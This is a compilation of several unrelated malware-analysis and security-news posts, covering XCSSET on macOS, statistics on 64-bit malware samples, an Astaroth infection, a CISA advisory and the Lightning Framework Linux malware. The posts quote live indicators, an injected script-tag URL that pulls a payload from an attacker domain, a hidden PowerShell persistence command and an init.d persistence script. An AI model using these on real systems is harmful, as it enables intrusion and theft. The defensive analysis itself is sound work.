Right from its initial version, XCSSET made use of python scripts for certain functions, in particular for dropping fake application icons on the Dock. It achieved this by abusing a public Github repo called DockUtil. In the latest version, we also note that XCSSET uses python to parse and steal data from the user’s (legitimate) Notes.app. For this functionality, they use a modified version of a plugin from a legitimate python-based tool called mac_apt used by macOS forensics experts.

mac_apt on Github (left); malware script found in XCSSET (right)

XCSSET’s authors have updated their AppleScripts to account for Apple’s recent removal of python 2. The following image shows how the malware authors updated their safari_remote.applescript for python3 and Monterey 12.3 and above.

Similarly, the comment in edge_remote.applescript shows that the authors are keenly aware that DockUtil and other utilities will need to be replaced in their toolkit in the near future.

XCSSET Threat Actors and Targets

While very little is publicly known about the actors behind XCSSET, their motivations or their exact targets, the actors have engaged with journalists and security researchers at times. The original version of XCSSET, which appeared in August 2020, contained the full names of two individuals. Subsequently, a Twitter account with the name ‘Hans’ briefly became active and sent private messages to a journalist, claiming that he was the real author and not the two individuals whose names appeared in the malware code. The same individual claimed that the targets were “developers from China” and “big gambling business”.

‘Hans’ subsequently disappeared from view, but about a year later another Twitter account in the name of ‘Vlad F’ began reaching out to researchers, complaining that they had been falsely accused of being the actors behind the malware.

While Apple refused to comment on these claims at the time, Vlad F’s Twitter account ceased to respond. Earlier this year, however, Chinese users reported XCSSET infections and attempts to unlock stolen “accounts” from victims in return for “200 USDT” (a so-called “stable” bitcoin belonging to Tether).

Prior to that, researchers had noticed that XCSSET infections were being embedded in a number of Github repositories.

It seems a new trojan is going around and affecting @Apple #iOS builds. I don’t know the original method of infection, but I’m starting to see some public repos on GitHub being affected https://t.co/EmutE0jCbD

— Pier Fumagalli 💉💉💉🦠💉😷 (@ianosh) June 4, 2021

At this point in time, it’s unclear whether these infected repos are victims or plants by threat actors hoping to infect unwary users. It has been suggested that unsuspecting users may be pointed to the infected repositories through tutorials and screencasts for novice developers. Our research into XCSSET and its infection vectors continues.

Staying Protected Against XCSSET Malware on macOS

XCSSET has many moving parts, and samples change rapidly. While some static signatures such as those used in Apple’s XProtect service will detect known samples, full protection against evolving threats like these is only really possible with a multi-engine agent including behavioral AI.

SentinelOne Singularity fully protects SentinelOne customers against XCSSET malware.

With the agent policy set to ‘Protect’, the malware is prevented from executing or dropping any of its components. For this demonstration, we set the policy to ‘Detect-only’ in order to observe further stage payloads.

Indicators of Compromise

Scripts
25f8d7ac99e00c9d69679f2d9aca5954d2609a03 ./brave_remote.applescript
0e1b2f01441e6e6fc8a48a7871e649d3647828cd ./canary_remote.applescript
4c368635ecfee61a89203f3f0e84bfdd7d85073d ./chrome_remote.applescript
2a2330b13886ffe0e4fe54f7254008490814b5fa ./chromium_remote.applescript
fd82b821fa2c23f2b88f64179e3a7a8905c1e40b ./contacts.applescript
bde20788e2656454052aae9baf2f4d2b7c256c9d ./edge_remote.applescript
3f35fd8306d4a05fadd9095acacd8d5f297a112e ./firefox_remote.applescript
3de232d0a42959b20703ebb9d9376b3ef3d3015d ./firewall_off.applescript
3257a1f540455444a56975e7fd9cdb6f8148b828 ./listing.applescript
2dbf06445a294b4f786501ef16ea4aabd8e1ad72 ./notes.applescript
6c0b4e3e3bac36f3228e69ab1e53884f76f6828b ./notes.py
6cf1ec6af6c6102c9d4929b1a83e0a463e737255 ./notes_app.applescript
73918b840384e485d009632fdf1a396758d7c515 ./opera_remote.applescript
e2de10a6b517e298cb2e7da150224dfe7e5717a7 ./payloader.applescript
5e673f4c494c424ae450f2ea5c0b066f912edccb ./pods_infect.applescript
73d9a443933fb0c40dde3065ec77adad35a5c49a ./remove_old.applescript
5b66e4b1556ad03b4bf072d061de0606eabe8603 ./replicator.applescript
672837de18d0e34f8b2a77bc2646b245671c83dc ./safari_remote.applescript
b66dbd55ce42a61cfedd06f31725b7f56d10d548 ./safari_update.applescript
fb29c9daa6fdeaa945446fe7cde185d51296dc7d ./telegram.applescript
760676a2e05d25959dee1f9ffaf3042e5f2e0f31 ./telegram_lite.applescript
4ffb268475e3816b22aadfb147bd7cd2f211e3d5 ./uploader.applescript
c2a90c68ad9d93139ebce981a409beae5d7de8bf ./yandex_remote.applescript
d70f4974bd531af674c5c2da3bc3c7d1a0ac9b54 ./360_remote.applescript
a57b73190525a729d821b6aed6849084fc1beddd ./a.applescript

Binaries
127b66afa20a1c42e653ee4f4b64cf1ee3ed637d ./exec.2430808
f4099a0884d3f1bf5602c8c6ba5265b76d7f4953 ./Pods
dde87aefcaf788f770e5e1229db4fe73873e1c36 ./agentd
bd13d22095d377938c50088e59fa3079143cb0f2 ./braved
a1449c5fbf8cf126502bd68a8e8d657b3dcfd87a ./canaryd
cbf08fae71fcd46cc852fad7502685466c40e168 ./edged
2a62d6bcac7b0c5e75f561458e934ec45c77699c ./firefoxd
263b243df32be6d9d9878c459d2fc6491342d547 ./metald
f3a747bf10763d7d8c1cd9ccedd1e25ee195fce3 ./open
2a6d37160f21ec13aa6c692a3ca3374db3d35e96 ./operad
1396fdbff38b787d14b1135dcdfc367658669637 ./speedd
e4b6c56faa97493dc0f0f7c4fc2196096ef66513 ./yandexd

Communications
adobefile[.]ru
appledocs[.]ru
Cosmodron[.]com
gismolow[.]com
gurumades[.]ru
kinksdoc[.]ru
melindas[.]ru
superdocs[.]ru
45[.]82[.]153[.]92

by John Tolbert

Organizations and individuals are constantly under threat by malware. Malware variants evolve and proliferate daily, making it increasingly difficult to prevent infections, compromises, and consequences such as data leakage and damage. While Endpoint Protection (EPP) solutions are primarily designed to prevent malware infection, Endpoint Detection & Response (EDR) solutions are intended to discover and remediate compromises by malware. Both kinds of products are necessary security infrastructure in today’s business reality. Malwarebytes Nebula is their EPDR offering, and Malwarebytes Incident Response adds granular remediation capabilities. Malwarebytes Incident Response (IR) Proprietary Linking Engine technology scans networked endpoints to root out and destroy the malware already downloaded and activated on a system. IR may be deployed as a standalone and easily integrated into existing infrastructure.

There are two main types of malware analysis: static and dynamic. Performing static analysis of a malicious binary means concentrating on analyzing its code without executing it. This type of analysis may reveal to malware analysts not only what the malware does, but also its developer’s future intentions (e.g., currently unfinished functionalities). Dynamic analysis looks at the behavior of the malware when it’s run – usually in a virtual sandbox. This type of analysis should … More

The post 7 open-source malware analysis tools you should try out appeared first on Help Net Security.

Last week, I was teaching FOR610 in Amsterdam. When we review ASM, we have a module about the differences between 32-bit and 64-bit code (how parameters are passed to functions/API calls, calling conventions, etc.). It’s important to understand this because most computers today are built around a 64-bit CPU. But attackers are still deploying a lot of 32-bit malware, for compatibility reasons and also because this code can run without problems (if you respect Microsoft guidelines and APIs). A student asked me if there was a lot of native 64-bit malware in the wild. Is there a real trend? I decided to have a look at a bunch of samples and see in practice whether this trend is real.

The problem is to get enough samples. I have my own “malware zoo” but it’s pretty small. You can try to get samples from major players like VirusTotal, but your API quotas probably won’t allow you to download a lot of samples. I decided to have a look at free (but still trusted) resources. My choice was MalwareBazaar[1]. I like this service provided by abuse.ch. They allow you to download samples for free and also report some interesting stats based on YARA rules[2].

I downloaded all daily archives from Feb 27 2020 until last week (217GB of zip archives). To detect if a PE file is 32-bits or 64-bits code, you just check a few bytes at the beginning of the file:

00000000: 4d5a 9000 0300 0000 0400 0000 ffff 0000  MZ..............
00000010: b800 0000 0000 0000 4000 0000 0000 0000  ........@.......
00000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000030: 0000 0000 0000 0000 0000 0000 8000 0000  ................
00000040: 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468  ........!..L.!Th
00000050: 6973 2070 726f 6772 616d 2063 616e 6e6f  is program canno
00000060: 7420 6265 2072 756e 2069 6e20 444f 5320  t be run in DOS 
00000070: 6d6f 6465 2e0d 0d0a 2400 0000 0000 0000  mode....$.......
00000080: 5045 0000 4c01 0900 8406 f862 0000 0000  PE..L......b....
00000090: 0000 0000 e000 2e03 0b01 0223 0004 ac00  ...........#....
000000a0: 005a e900 0008 0000 b014 0000 0010 0000  .Z..............
000000b0: 0020 ac00 0000 4000 0010 0000 0002 0000  . ....@.........
000000c0: 0400 0000 0100 0000 0400 0000 0000 0000  ................
000000d0: 00c0 e900 0004 0000 179d e900 0200 4001  ..............@.

If you read “PE..L”, it’s a 32-bit sample; if you read “PE..d”, it’s a 64-bit sample (the byte right after the “PE\0\0” signature is the low byte of the COFF Machine field: 0x4c from 0x014c for x86, 0x64 from 0x8664 for x64). I wrote a quick and dirty YARA rule to match these sequences of bytes:

rule pe32bits
{
    meta:
        description = "Match a 32-bits PE"
    strings:
        $a = {50 45 00 00 4c}
    condition:
        $a in (0..500)
}
rule pe64bits
{
    meta:
        description = "Match a 64-bits PE"
    strings:
        $a = {50 45 00 00 64}
    condition:
        $a in (0..500)
}

Because I had a lot of ZIP archives to process and did not want to use too much storage, I used Python to process all files straight from the ZIP archives and run the YARA rules against them. I focused only on “.exe” and “.dll” files:

#!/usr/bin/python3
import datetime
import glob
import re
import yara
from zipfile import ZipFile

rules = yara.compile(filepath='3264.yar')
print("date,file,arch")
zipList = glob.glob('*.zip')
for zipName in zipList:
    # MalwareBazaar daily archives are named YYYY-MM-DD.zip
    day = datetime.datetime.strptime(zipName.split(".")[0], '%Y-%m-%d').strftime("%d/%m/%Y %H:%M:%S")
    with ZipFile(zipName, 'r') as zipObj:
        zipObj.setpassword(b"infected")  # the daily archives are password-protected
        files = zipObj.infolist()
        for f in files:
            # only inspect .exe and .dll members; the archives are never extracted to disk
            if re.match(r'[0-9]+.*\.(exe|dll)$', f.filename):
                with zipObj.open(f.filename, mode='r') as fdata:
                    matches = rules.match(data=fdata.read())
                    if len(matches) > 0:
                        # str(match) is the rule name: pe32bits or pe64bits
                        print("%s,%s,%s" % (day, f.filename, matches[0]))
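The byte-pattern check above works for the common case, but it has two blind spots: it only looks in the first 500 bytes, so a PE with a large DOS stub is missed, and it keys on one byte of the Machine field, so it cannot tell AMD64 from ARM64 (both end in 0x64) and returns nothing for other architectures. The following added Python example (not the diary's script) does the check properly by following e_lfanew from the DOS header to the PE signature and reading the full 16-bit Machine value. The IMAGE_FILE_MACHINE values are from the PE/COFF specification; the minimal headers are constructed for the example, and PAGE_DUMP_HEAD is transcribed from the first 0x90 bytes of the hexdump shown above.

```python
import struct

# Machine values from the PE/COFF specification (IMAGE_FILE_MACHINE_*).
IMAGE_FILE_MACHINE = {
    0x014C: "x86 (I386)",
    0x8664: "x64 (AMD64)",
    0x01C4: "ARM Thumb-2 (ARMNT)",
    0xAA64: "ARM64",
}

# First 0x90 bytes of the sample shown in the diary's hexdump above.
PAGE_DUMP_HEAD = bytes.fromhex(
    "4d5a90000300000004000000ffff0000"
    "b8000000000000004000000000000000"
    "00000000000000000000000000000000"
    "00000000000000000000000080000000"
    "0e1fba0e00b409cd21b8014ccd215468"
    "69732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f5320"
    "6d6f64652e0d0d0a2400000000000000"
    "504500004c0109008406f86200000000"
)


def pe_machine(data):
    """Return (machine, name) by following e_lfanew; raise ValueError if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    return machine, IMAGE_FILE_MACHINE.get(machine, "unknown (0x%04x)" % machine)


def quick_sig_check(data):
    """The diary's byte-pattern check: 'PE\\0\\0' + 'L' or 'd' within the first 500 bytes."""
    head = data[:500]
    if b"PE\0\0L" in head:
        return "32"
    if b"PE\0\0d" in head:
        return "64"
    return None


def build_sample_pe(machine, e_lfanew=0x80, stub=b""):
    """Constructed minimal header: DOS header, optional stub bytes, PE signature, COFF Machine."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    body = bytes(dos) + stub
    if len(body) > e_lfanew:
        raise ValueError("stub overlaps PE header")
    body += b"\0" * (e_lfanew - len(body))
    # 20-byte COFF header: Machine first, remaining fields zeroed for the example
    return body + b"PE\0\0" + struct.pack("<H", machine) + b"\0" * 18


if __name__ == "__main__":
    for label, sample in [
        ("diary dump", PAGE_DUMP_HEAD),
        ("arm64", build_sample_pe(0xAA64)),
        ("x86, big DOS stub", build_sample_pe(0x014C, e_lfanew=0x300)),
        ("x64 with 'PE..L' text in stub", build_sample_pe(0x8664, stub=b"PE\0\0L")),
    ]:
        print(f"{label:32} quick={quick_sig_check(sample)!s:5} parsed={pe_machine(sample)[1]}")
```

The last two constructed cases are the ones worth remembering when reading statistics built from the quick rule: a file whose PE header sits beyond offset 500 is counted as neither, and a stray "PE\0\0L" inside the DOS stub is reported as 32-bit even when the real header says AMD64.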

Let’s have a look at the results. I loaded the CSV file into Splunk.

175.962 samples have been inspected (only EXE & DLL files)
10.952 were detected as 64-bits code (6.224%)
Only 1 DLL was detected as 64-bits code (HASH:86150c570e2d253d54fd5f70c9fe62ff37897dc3a7b21658fa891263a843790d)

If we check on a timeline, we have a small trend:

I have no idea about the peak of samples submitted in November 2021, but we see that, especially in the last months, there are more and more 64-bit samples in the wild. Can we rely on these statistics? Samples downloaded from MalwareBazaar are only the visible part of the iceberg but, as it became popular, many security researchers use it. If you have other statistics, please share them with us!

[1] https://bazaar.abuse.ch
[2] https://bazaar.abuse.ch/export/json/yara-stats/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

Introduction

Today’s diary is a quick post about an Astaroth (Guildma) malware infection I generated today, Friday 2022-08-19, from a malicious Boleto-themed email pretending to be from Grupo Solução & CIA.  Boleto is a payment method used in Brazil, while Grupo Solução & CIA is a Brazil-based company.

Images from the infection


Shown above:  Screenshot of the malicious email with link to download a malicious zip archive.


Shown above:  Link from email leads to web page pretending to be from Docusign that provides malicious zip archive for download.


Shown above:  Downloaded zip archive contains a Windows shortcut and a batch file.  Both are designed to infect a vulnerable Windows host with Astaroth (Guildma).


Shown above:  Traffic from the infection filtered in Wireshark (part 1 of 3).


Shown above:  Traffic from the infection filtered in Wireshark (part 2 of 3).


Shown above:  Artifact from the infected host’s C:\Users\Public directory.


Shown above:  Artifact on the infected host’s C: drive at C:J9oIM9JJ9oIM9J.jS.


Shown above:  Windows shortcut in the infected user’s Roaming\Microsoft\Windows\Start Menu\Programs\Startup directory to keep the infection persistent.


Shown above:  Directory with persistent files used for the Astaroth (Guildma) infection.


Shown above:  Astaroth (Guildma) performs post-infection data exfiltration through HTTP POST requests.

Indicators of Compromise (IOCs)

Link from email:

hxxp://w7oaer.infocloudgruposolucaoecia[.]link/P05dWVqI0WghlU4/UeWgmk3mU3p8yeyxkUgI8Um1R1/65837/gruposolucaoeciainfocloud

IP address and TCP port for initial malicious domain:

172.67.217[.]95 port 80 – w7oaer.infocloudgruposolucaoecia[.]link

URL to legitimate website generated from iframe in the above traffic:

hxxp://www.intangiblesearch[.]it/search/home_page.php?db_name=%3Cscript%20src=%22https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js%22%3E%3C/script%3E%3Cscript%20type=%22text/javascript%22%20src=%22hxxp://w7oaer.infocloudgruposolucaoecia[.]link/P05dWVqI0WghlU4/UeWgmk3mU3p8yeyxkUgI8Um1R1/65837/gruposolucaoeciainfocloudAvDk.T036%22%3E%3C/script%3E?

Traffic to initial malicious domain that provides zip archive download:

hxxp://w7oaer.infocloudgruposolucaoecia[.]link/P05dWVqI0WghlU4/UeWgmk3mU3p8yeyxkUgI8Um1R1/65837/gruposolucaoeciainfocloudAvDk.T036
hxxp://w7oaer.infocloudgruposolucaoecia[.]link//inc.php?/gruposolucaoeciainfocloud
hxxp://w7oaer.infocloudgruposolucaoecia[.]link/YBZJPTBQV/482NJ8NS74J9/N6D6WW/gruposolucaoeciainfocloud_097.88933.61414z64y64

Traffic generated by Windows shortcut or batch file from the downloaded zip archive:

172.67.212[.]174:80 ahaaer.pfktaacgojiozfehwkkimhkbkm[.]cfd GET /?1/
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs HEAD /?59792746413628799
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs GET /?59792746413628799
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs HEAD /?33954141807632999
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs GET /?33954141807632999
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs HEAD /?71576927405639060
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs GET /?71576927405639060
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs HEAD /?59784568396678051
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs GET /?59784568396678051
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs HEAD /?40018133101693668
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs GET /?40018133101693668
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs HEAD /?33450285101613952
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs GET /?33450285101613952

Data exfiltration through HTTP POST requests:

104.21.25[.]34:80 hcu11m2mkk2.rouepcgomfhejergdahjcfcugarfcmoa[.]tk POST /
172.67.165[.]46:80 j2vfrc7gddo.aeabihjpejprueuibdjmhfmdcpsfr[.]gq POST /

Example of downloaded zip archive:

SHA256 hash: f254f9deeb61f0a53e021c6c0859ba4e745169322fe2fb91ad2875f5bf077300

File size: 1,091 bytes
File name: gruposolucaoeciainfocloud_097.88933.61414.zip

Contents from the above zip archive:

SHA256 hash: 5ca1e9f0e79185dde9655376b8cecc29193ad3e933c7b93dc1a6ce2a60e63bba

File size: 338 bytes
File name: gruposolucaoeciainfocloud_097.88933157.086456.45192.cmd

SHA256 hash: db136e87a5835e56d39c225e00b675727dc73a788f90882ad81a1500ac0a17d6

File size: 1,341 bytes
File name: gruposolucaoeciainfocloud_097.88933157.086456.45192.lNk

Command from Windows shortcut in Windows Startup folder on the infected Windows host:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -Command C:W45784602214Asus.CertificateValidation.2022.1728.641.AutoIt3.exe C:W45784602214Asus.CertificateValidation.2022.1728.641.AutoIt3.log

Files used for persistent infection:

SHA256 hash: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

File size: 893,608 bytes
File location: C:W45784602214Asus.CertificateValidation.2022.1728.641.AutoIt3.exe
File description: Windows EXE for AutoIt v3, not inherently malicious

SHA256 hash: e31658734d3e0de1d2764636d1b8726f0f8319b0e50b87e5949ec162ae1c0050

File size: 246,116 bytes
File location: C:W45784602214Asus.CertificateValidation.2022.1728.641.AutoIt3.log
File description: Malicious data binary, AutoIt v3 compiled script run by above Windows EXE for AutoIt v3

Final words

A pcap of the infection traffic, the associated malware/artifacts, and the email that kicked off this infection are available here.

Brad Duncan
brad [at] malware-traffic-analysis.net

Original release date: August 2, 2022 | Last revised: August 4, 2022

CISA and the Australian Cyber Security Centre (ACSC) have published a joint Cybersecurity Advisory on the top malware strains observed in 2021. Malicious cyber actors often use malware to covertly compromise and then gain access to a computer or mobile device. As malicious cyber actors have been using most of these top malware strains for more than five years, organizations have opportunities to better prepare, identify, and mitigate attacks from these strains.  

CISA and ACSC encourage organizations to apply the recommendations in the Mitigations sections of the joint CSA. These mitigations include prioritizing patching all systems with known exploited vulnerabilities, enforcing multifactor authentication (MFA), securing remote desktop protocol (RDP) and other risky services, making offline backups of your data, and providing end-user awareness and training about social engineering and phishing. The appendix contains detection signatures organizations can employ in defending their networks. For more information on preventing malicious cyber actors from using 2021 top malware strains to exploit vulnerabilities, see:

•    CISA’s Known Exploited Vulnerabilities Catalog
•    CISA’s Cyber Hygiene Services
•    CISA’s Choosing and Protecting Passwords
•    ACSC’s Implementing Multi-Factor Authentication

Lightning Framework is a new undetected Swiss Army Knife-like Linux malware that has modular plugins and the ability to install rootkits.

Year after year, Linux environments increasingly become the target of malware due to continued threat actor interest in the space. Malware targeting Linux environments surged in 2021, with a large amount of innovation resulting in new malicious code, especially ransomware, trojans, and botnets. With the rise in use of the cloud, it is no wonder that malware innovation in this realm is still accelerating at breakneck speed.

This is a technical analysis of a previously undocumented and undetected Linux threat called the Lightning Framework. It is rare to see such an intricate framework developed for targeting Linux systems. Lightning is a modular framework we discovered that has a plethora of capabilities, and the ability to install multiple types of rootkit, as well as the capability to run plugins. The framework has both passive and active capabilities for communication with the threat actor, including opening up SSH on an infected machine, and a polymorphic malleable command and control configuration. We are releasing this blog for informational purposes. We do not have all the files that are referenced in the framework, but hope that this release will help others if they possess other pieces of the jigsaw puzzle. We have not observed this malware being used in attacks in the wild.

Technical Analysis of Lightning Framework

The framework consists of a downloader and core module, with a number of plugins. Some of the plugins used by the malware are open-source tools. Below is a figure of the framework layout:

[Figure: Lightning Framework layout]

Overview of the Modules

Name | Name on Disk | Description
Lightning.Downloader | kbioset | The persistent module that downloads the core module and its plugins
Lightning.Core | kkdmflush | The main module of the Lightning Framework
Linux.Plugin.Lightning.SsHijacker | soss | There is a reference to this module but no sample found in the wild yet.
Linux.Plugin.Lightning.Sshd | sshod | OpenSSH with hardcoded private and host keys
Linux.Plugin.Lightning.Nethogs | nethoogs | There is a reference to this module but no sample found in the wild yet. Presumably the software Nethogs
Linux.Plugin.Lightning.iftop | iftoop | There is a reference to this module but no sample found in the wild yet. Presumably the software iftop
Linux.Plugin.Lightning.iptraf | iptraof | There is a reference to this module but no sample found in the wild yet. Presumably the software IPTraf
Linux.Plugin.RootkieHide | libsystemd.so.2 | There is a reference to this module but no sample found in the wild yet. LD_PRELOAD Rootkit
Linux.Plugin.Kernel | elastisearch.ko | There is a reference to this module but no sample found in the wild yet. LKM Rootkit

Lightning.Downloader

The main function of the downloader module is to fetch the other components and execute the core module.

[Figure: Lightning Downloader result in Intezer Analyze]

The downloader module starts by checking whether it is located in the working directory /usr/lib64/seahorses/ under the name kbioset. The framework makes heavy use of typosquatting and masquerading in order to remain undetected; the seahorses directory name masquerades as seahorse, the password and key manager. If it is not already there, it relocates itself to that working directory and executes that copy. The downloader then fingerprints the host name and network adapters to generate a GUID, which is sent to the command and control (C2) server.

Building the GUID

The downloader will then contact the C2 to fetch the following modules and plugins:

Linux.Plugin.Lightning.SsHijacker
Linux.Plugin.Lightning.Sshd
Linux.Plugin.Lightning.Nethogs
Linux.Plugin.Lightning.iftop
Linux.Plugin.Lightning.iptraf
Lightning.Core

Resources fetched from the C2

The method of contacting the C2 is described in the Network Communication section below. The downloader then executes the core module (kkdmflush).

[Figure: Execution of the core module]

Lightning.Core

The core module is the main module in this framework: it receives commands from the C2 and executes the plugin modules. The module has many capabilities and uses a number of techniques to hide its artifacts and remain under the radar.

The core module modifies the name of the calling thread of the module to kdmflush, to make it appear that it is a kernel thread. 

Using prctl to modify calling thread name

Next the core module sets up persistence by creating a script that is executed upon system boot. This is achieved by first creating a file located at /etc/rc.d/init.d/elastisearch. The name appears to typosquat elasticsearch. The following contents are written to the file:

#!/bin/bash
# chkconfig:2345 90 20
/usr/lib64/seahorses/kbioset &

This script will execute the downloader module upon boot. The service is then added using the chkconfig utility. 

Creation of the init.d script and service

The timestamp of the file is modified to hide artifacts, a technique known as “timestomping”. The file has its last modified time edited to match that of either whoami, find, or su. It will look for each file respectively until it finds one. This technique is used for most of the files that the framework creates.

File timestamp modification function

The malware will attempt to hide its process ID (PID) and any related network ports. This is achieved by writing the framework's running PIDs to two files, hpi and hpo. These files are parsed, and the existence of the file proc/y.y is then checked. If the file exists, it means that a rootkit has been installed. The PIDs are written to proc/y.y for use by the rootkit, which may scrub any reference to the framework's processes from the output of commands such as ps and netstat.

Writing PID to proc/y.y if it exists (Indication that rootkit exists)
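The hiding techniques above each leave a checkable trace on the host: a "kdmflush" that is not a real kernel thread, files under the seahorses directory, the chkconfig init script, and an mtime copied from whoami, find or su. The following host-triage module is an added example, not Intezer's code; it takes the artifact names from this analysis, and the procfs entries, file events and timestamps it runs on in __main__ are constructed test data rather than captures from a real host.

```python
import os
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Artifact names taken from the analysis above.
SUSPECT_DIR = "/usr/lib64/seahorses/"           # masquerades the seahorse key manager
SUSPECT_NAMES = ("kbioset", "cpc", "kkdmflush", "soss", "sshod",
                 "nethoogs", "iftoop", "iptraof")  # typosquatted module names
INIT_SCRIPT = "/etc/rc.d/init.d/elastisearch"   # typosquats elasticsearch
FAKE_KTHREAD_NAME = "kdmflush"                  # name the core module gives its thread
KTHREADD_PID = 2                                # parent of every genuine kernel thread


@dataclass
class ProcEntry:
    pid: int
    ppid: int
    comm: str       # /proc/<pid>/comm; user code can set it with prctl(PR_SET_NAME)
    has_exe: bool   # /proc/<pid>/exe resolves; kernel threads have no backing file


def is_fake_kernel_thread(p: ProcEntry) -> bool:
    """A genuine kdmflush worker is a kernel thread: spawned by kthreadd and
    with no executable behind it. A 'kdmflush' that breaks either rule is a
    user process wearing the name."""
    return p.comm == FAKE_KTHREAD_NAME and (p.ppid != KTHREADD_PID or p.has_exe)


def lightning_file_event(path: str) -> bool:
    """Created under the seahorses directory and carrying one of the module names."""
    return path.startswith(SUSPECT_DIR) and any(n in path for n in SUSPECT_NAMES)


def init_script_suspect(contents: str) -> bool:
    """The persistence script registers with chkconfig and starts the
    downloader from the seahorses directory."""
    return "chkconfig:" in contents and SUSPECT_DIR + "kbioset" in contents


def timestomp_suspect(target_mtime: int, template_mtimes: Iterable[int]) -> bool:
    """The framework copies the mtime of whoami, find or su onto files it
    creates, so a new init script whose mtime equals one of those binaries
    to the second is a strong indicator."""
    return any(target_mtime == t for t in template_mtimes)


def collect_procs(proc_root: str = "/proc") -> List[ProcEntry]:
    """Read live procfs (Linux only). readlink(exe) fails for kernel threads."""
    entries = []
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        base = f"{proc_root}/{name}"
        try:
            with open(f"{base}/comm") as fh:
                comm = fh.read().strip()
            with open(f"{base}/stat") as fh:
                # ppid is the second field after the ')' that closes the comm field
                ppid = int(fh.read().rsplit(")", 1)[1].split()[1])
            try:
                os.readlink(f"{base}/exe")
                has_exe = True
            except OSError:
                has_exe = False
        except OSError:
            continue  # the process exited while we were reading it
        entries.append(ProcEntry(int(name), ppid, comm, has_exe))
    return entries


def triage(procs: Iterable[ProcEntry], created_files: Iterable[str],
           init_script_text: str, init_mtime: int,
           template_mtimes: Iterable[int]) -> List[Tuple[str, str]]:
    """Return (indicator, detail) pairs for everything that matched."""
    hits = []
    for p in procs:
        if is_fake_kernel_thread(p):
            hits.append(("fake-kernel-thread", f"pid {p.pid} ppid {p.ppid} comm {p.comm}"))
    for path in created_files:
        if lightning_file_event(path):
            hits.append(("lightning-file-path", path))
    if init_script_suspect(init_script_text):
        hits.append(("init-script", INIT_SCRIPT))
        if timestomp_suspect(init_mtime, template_mtimes):
            hits.append(("timestomp", f"{INIT_SCRIPT} mtime {init_mtime} matches a template binary"))
    return hits


if __name__ == "__main__":
    # Constructed test data, not captures from a real host.
    procs = [ProcEntry(35, 2, "kdmflush", False),     # genuine kernel worker
             ProcEntry(4242, 1, "kdmflush", True)]    # userland masquerade
    files = ["/usr/lib64/seahorses/kbioset", "/usr/lib64/seahorses/cpc",
             "/usr/lib64/libz.so.1"]
    script = "#!/bin/bash\n# chkconfig:2345 90 20\n/usr/lib64/seahorses/kbioset &\n"
    for hit in triage(procs, files, script, 1600000000,
                      [1600000000, 1590000000, 1580000000]):
        print(*hit)
```

On a live host, replace the constructed procs with collect_procs() and the file list with the output of your file-integrity or auditd source.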

The core module will generate a GUID in the same manner as the downloader and contact the C2. The response is parsed and the command is executed. The core module has the following commands:

Command | Description
SystemInfo | Fingerprints the machine
PureShellCommand | Runs Shell command
RunShellPure | Starts the Linux.Plugin.Lightning.Sshd (SSH Daemon) plugin
CloseShellPure | Terminates the Linux.Plugin.Lightning.Sshd plugin
Disconnect | Exits the Core module
GetRemotePathInfo | Collects the summary of given path
KeepAlive | No action, connection remains alive
UploadFileHeader | Checks access of file
FileEdit | Gets contents of file and time meta
TryPassSSH | Adds a public key to the root/.ssh/authorized_keys file
DeleteVecFile | Deletes the specified file or path
PreDownloadFile | Calculates a checksum of the file
DownloadFile | Sends a file to the C2
DeleteGuid | Removes the framework
UpdateVersion | Calls the Downloader module to update the framework
UpdateRemoteVersion | Updates the framework including the downloader
Socks5 | Sets up a Socks5 proxy
RestorePlug | The same as UpdateVersion
GetDomainSetting | Fetches the contents of the malleable C2 configuration file (cpc)
SetDomainSetting | Updates the contents of the malleable C2 configuration file (cpc)
InstallKernelHide | Fetches the OS release
RemoveKernelHide | Removes kernel module
UpdateKernelVersion | Removes the kernel module and runs uname -r
OverrideFile | Overwrites specified file
UploadFileContent | Writes data sent from server to file
LocalPluginRequest | Either write the LD_PRELOAD rootkit or LKM rootkit

Network Communication

Network communication in the Core and Downloader modules is performed over TCP sockets, with the data structured as JSON. The C2 address is stored in a polymorphically encoded configuration file that is unique every time one is created, so configuration files cannot be detected by techniques such as hash matching. The key is built into the start of the encoded file.

Encoded malleable C2 configuration profile

The dynamic XOR decoding routine 

The decoded configuration is structured in JSON. The default configuration in the analyzed sample uses a local IP address 10.2.22[.]67 with the port 33229. 

Decoded default configuration

